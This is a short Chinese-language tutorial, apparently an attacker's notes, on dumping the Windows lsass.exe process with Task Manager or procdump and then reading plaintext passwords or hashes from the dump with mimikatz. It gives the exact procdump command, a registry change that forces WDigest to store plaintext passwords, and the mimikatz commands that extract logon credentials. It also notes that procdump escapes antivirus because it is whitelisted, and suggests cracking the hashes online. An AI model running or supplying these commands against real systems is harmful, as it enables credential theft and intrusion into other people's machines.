內存轉儲讀取密碼
轉儲文件也就是我們常說的dump文件。可以把轉儲文件看成軟件的某個時刻的一個快照。轉儲文件一般都是在軟件出現問題時手動生成或者程序自動生成。
將lsass.exe進程轉儲成文件后可利用mimi讀取其中存儲的本地用戶明文密碼或hash
注意
- win2008及以下可獲取明文密碼
- win2012及以上默認不記錄明文密碼,需要修改注冊表重啟后才可以,即僅能獲取hash
獲得轉儲文件
任務管理器轉儲
利用procdump轉儲
- procdump,微軟維護工具,主要使用它來進行內存轉儲。Windows在運行的時候不能復制SYSTEM和SAM文件。
- 需要管理員權限,且procdump是微軟工具,在殺軟白名單中。
- 該方法只能在Window 2003、Windows 2008、Windows 2008 R2,且沒有打補丁(KB2871997)的情況下可以獲取該系統在未清理內存(意為未重啟)時存儲的登錄信息憑證。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
開啟注冊表記錄明文密碼
reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
mimi讀取密碼
獲取lasaa.dmp后,可利用各種工具讀取存儲的明文密碼或hash
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
2012
可以看見,無法獲取明文密碼,但可以獲取hash,如果不復雜可嘗試使用cmd5等進行解碼